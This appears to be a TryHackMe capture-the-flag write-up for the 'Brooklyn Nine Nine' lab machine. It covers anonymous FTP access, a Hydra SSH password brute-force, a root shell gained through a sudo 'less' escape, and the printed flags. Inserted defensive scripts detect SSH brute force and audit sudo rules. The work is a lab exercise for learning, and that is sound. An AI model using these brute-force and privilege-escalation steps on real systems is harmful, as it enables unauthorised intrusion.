[TryHackMe] Brooklyn Nine Nine

Today we are going to hack the TryHackMe machine called Brooklyn Nine Nine. You can download it from the following link: Brooklyn Nine Nine

Enumeration


We start with an nmap scan to see which ports are open.

~ > nmap -A 10.10.60.217
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 08:13 CEST
Nmap scan report for 10.10.60.217
Host is up (0.057s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             119 May 17 23:17 note_to_jake.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.24.208
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
|   256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_  256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.98 seconds

Nmap shows that we can log in to the FTP service as the anonymous user. We connect to the FTP server to see if there is anything interesting.

~ > ftp 10.10.60.217
Connected to 10.10.60.217.
220 (vsFTPd 3.0.3)
Name (10.10.60.217:sml): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             119 May 17 23:17 note_to_jake.txt
226 Directory send OK.

We see the file note_to_jake.txt, so we download it.

ftp> get note_to_jake.txt
local: note_to_jake.txt remote: note_to_jake.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note_to_jake.txt (119 bytes).
226 Transfer complete.
119 bytes received in 0.11 secs (1.0441 kB/s)
ftp> exit
221 Goodbye.

We take a look at the contents of the file.

~ > cat note_to_jake.txt
From Amy,
Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine

We can see that Amy is telling Jake to change his password because it is weak. With this information, we use hydra to brute-force jake's password over SSH.

~ > hydra -l jake -P rockyou.txt 10.10.60.217 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-08 08:14:35
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.60.217:22/
[22][ssh] host: 10.10.60.217   login: jake   password: 987654321

We get the password! We use jake's credentials to connect over SSH...
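The defender-side counterpart to the brute force above, added here and not part of the original write-up: it scans constructed auth.log-style lines (the hostname and attacker IP are the ones that appear in this write-up) for the burst of failed logins followed by an accepted password that a Hydra run leaves behind.

```python
"""Detect SSH password brute force in auth.log-style lines.
Added example, not from the original write-up: flags a source IP that racks
up many failed password attempts against one account and then logs in, the
trace a Hydra run like the one above leaves in /var/log/auth.log."""
import re
from collections import defaultdict

# Constructed sample lines in the format of Ubuntu's /var/log/auth.log.
SAMPLE_LOG = """\
Aug  8 08:14:36 brookly_nine_nine sshd[1201]: Failed password for jake from 10.9.24.208 port 40102 ssh2
Aug  8 08:14:36 brookly_nine_nine sshd[1203]: Failed password for jake from 10.9.24.208 port 40104 ssh2
Aug  8 08:14:37 brookly_nine_nine sshd[1205]: Failed password for jake from 10.9.24.208 port 40106 ssh2
Aug  8 08:14:37 brookly_nine_nine sshd[1207]: Failed password for invalid user admin from 10.9.24.208 port 40108 ssh2
Aug  8 08:14:38 brookly_nine_nine sshd[1209]: Failed password for jake from 10.9.24.208 port 40110 ssh2
Aug  8 08:14:39 brookly_nine_nine sshd[1211]: Accepted password for jake from 10.9.24.208 port 40112 ssh2
Aug  8 09:00:01 brookly_nine_nine sshd[1300]: Accepted publickey for holt from 10.9.24.50 port 51000 ssh2
"""

FAILED = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+)")
ACCEPTED = re.compile(r"sshd\[\d+\]: Accepted (\S+) for (\S+) from (\S+)")

def detect_bruteforce(log_text, threshold=3):
    """Return [(ip, user, failed_count, login_succeeded)] for every (ip, user)
    pair that reaches `threshold` failed password attempts."""
    failures = defaultdict(int)   # (ip, user) -> failed attempts so far
    alerts = {}                   # (ip, user) -> did a password login follow?
    for line in log_text.splitlines():
        m = FAILED.search(line)
        if m:
            key = (m.group(2), m.group(1))
            failures[key] += 1
            if failures[key] >= threshold:
                alerts.setdefault(key, False)
            continue
        m = ACCEPTED.search(line)
        if m:
            method, user, ip = m.groups()
            # A successful password login after the burst means a guess landed.
            if (ip, user) in alerts and method == "password":
                alerts[(ip, user)] = True
    return [(ip, user, failures[(ip, user)], ok) for (ip, user), ok in alerts.items()]

for ip, user, n, success in detect_bruteforce(SAMPLE_LOG):
    print(f"{ip} -> {user}: {n} failed attempts, password login followed: {success}")
```

On a real host the same pattern is what fail2ban keys on; disabling password authentication in sshd_config (PasswordAuthentication no) removes the attack surface entirely.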

Low Shell


We log in as jake.

~ > ssh jake@10.10.60.217
jake@10.10.60.217's password: 
Last login: Tue May 26 08:56:58 2020

user.txt


We explore the system to look for the user flag.

jake@brookly_nine_nine:/home$ cd /home
jake@brookly_nine_nine:/home$ ls
amy  holt  jake
jake@brookly_nine_nine:/home$ cd holt
jake@brookly_nine_nine:/home/holt$ ls -la
total 48
drwxr-xr-x 6 holt holt 4096 May 26 09:01 .
drwxr-xr-x 5 root root 4096 May 18 10:21 ..
-rw------- 1 holt holt   18 May 26 09:01 .bash_history
-rw-r--r-- 1 holt holt  220 May 17 21:42 .bash_logout
-rw-r--r-- 1 holt holt 3771 May 17 21:42 .bashrc
drwx------ 2 holt holt 4096 May 18 10:24 .cache
drwx------ 3 holt holt 4096 May 18 10:24 .gnupg
drwxrwxr-x 3 holt holt 4096 May 17 21:46 .local
-rw-r--r-- 1 holt holt  807 May 17 21:42 .profile
drwx------ 2 holt holt 4096 May 18 14:45 .ssh
-rw------- 1 root root  110 May 18 17:12 nano.save
-rw-rw-r-- 1 holt holt   33 May 17 21:49 user.txt
jake@brookly_nine_nine:/home/holt$ cat user.txt
ee11cbb19052e40b07aac0ca060c23ee

We check whether we can do anything with sudo.

jake@brookly_nine_nine:~$ sudo -l
Matching Defaults entries for jake on brookly_nine_nine:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jake may run the following commands on brookly_nine_nine:
    (ALL) NOPASSWD: /usr/bin/less

Privilege Escalation


We see that we can run less as root, which can give us a shell with elevated privileges. To do so, we run:

jake@brookly_nine_nine:~$ sudo /usr/bin/less /etc/shadow

Once the file is being displayed, we type:

!/bin/bash

And with that we have a root shell:

root@brookly_nine_nine:~# id
uid=0(root) gid=0(root) groups=0(root)
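The hardening counterpart to this escalation, added here and not part of the original write-up: an audit of `sudo -l` output that flags rules like the one on this machine, where a pager or editor runs as root with NOPASSWD and without the sudoers NOEXEC tag. The rule set parsed below is a constructed sample built around the real rule shown above.

```python
"""Audit `sudo -l` output for NOPASSWD rules on programs with shell escapes.
Added example, not from the original write-up: flags rules like the one
above (a pager runnable as root without password and without NOEXEC)."""
import re

# Programs that can spawn a subprocess from inside (less's "!" command, etc.).
# Illustrative set, not exhaustive.
SHELL_ESCAPE_BINARIES = {"less", "more", "vi", "vim", "nano", "man", "find"}

# Constructed sample: this machine's rule plus two rules that would pass.
SAMPLE_SUDO_L = """\
User jake may run the following commands on brookly_nine_nine:
    (ALL) NOPASSWD: /usr/bin/less
    (ALL) NOPASSWD: NOEXEC: /usr/bin/less /var/log/syslog
    (root) /usr/bin/systemctl restart apache2
"""

# (runas) [TAG: ...] /path/to/command [args]
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)(?P<args>.*)$")

def audit_sudo_l(text):
    """Return (rule line, reason) for each rule that allows a shell escape."""
    findings, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True  # everything after this header is a rule
            continue
        m = RULE.match(line) if in_rules else None
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        binary = m.group("cmd").rsplit("/", 1)[-1]
        # NOEXEC makes sudo block any program the command tries to execute,
        # which is the sudoers-level fix for pager/editor escapes.
        if binary not in SHELL_ESCAPE_BINARIES or "NOEXEC" in tags:
            continue
        reasons = [f"{binary} can launch a subprocess as {m.group('runas')}"]
        if "NOPASSWD" in tags:
            reasons.append("no password required")
        if not m.group("args").strip():
            reasons.append("no argument restriction")
        findings.append((line.strip(), "; ".join(reasons)))
    return findings

for rule, why in audit_sudo_l(SAMPLE_SUDO_L):
    print(f"RISK: {rule} -> {why}")
```

Run it against the real output with `sudo -l | python3 audit.py` after swapping SAMPLE_SUDO_L for sys.stdin.read(); the fix on this box would be to drop the rule or at least add NOEXEC and pin the file argument.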

root.txt


root@brookly_nine_nine:/root# cat /root/root.txt 
-- Creator : Fsociety2006 --
Congratulations in rooting Brooklyn Nine Nine
Here is the flag: 63a9f0ea7bb98050796b649e85481845

Enjoy!!
root@brookly_nine_nine:/root# 

End


With this, we have finished the machine :)